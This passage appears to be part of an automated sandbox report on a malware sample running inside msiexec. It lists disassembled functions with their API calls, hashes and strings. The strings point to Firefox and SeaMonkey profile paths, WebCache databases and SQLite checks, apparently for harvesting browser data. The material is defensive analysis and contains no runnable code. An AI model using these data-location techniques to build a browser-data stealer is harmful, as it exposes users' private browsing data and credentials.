                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$FolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                    • API String ID: 3327325665-2068335096
                                                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$wcslen$FolderPathSpecial_snwprintfmemcpywcscat
                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                    • API String ID: 3327325665-3369679110
                                                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                    Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorFileLastfree
                                                                                                    • String ID: |A
                                                                                                    • API String ID: 981974120-1717621600
                                                                                                    • Opcode ID: dc25b19c204b3d730842b4eda81419d6b9d54c0f258f35022a130a99cd2c480c
                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                    • Opcode Fuzzy Hash: dc25b19c204b3d730842b4eda81419d6b9d54c0f258f35022a130a99cd2c480c
                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                    • String ID: $0.@
                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2941347001-0
                                                                                                    • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                    • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscat$FolderPathSpecialwcscpywcslen
                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                    • API String ID: 4120512944-1174173950
                                                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                    • String ID: "%s"
                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2911713577-0
                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID: @ $SQLite format 3
                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                    Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 1557896971-2036018995
                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                    • API String ID: 2887208581-2114579845
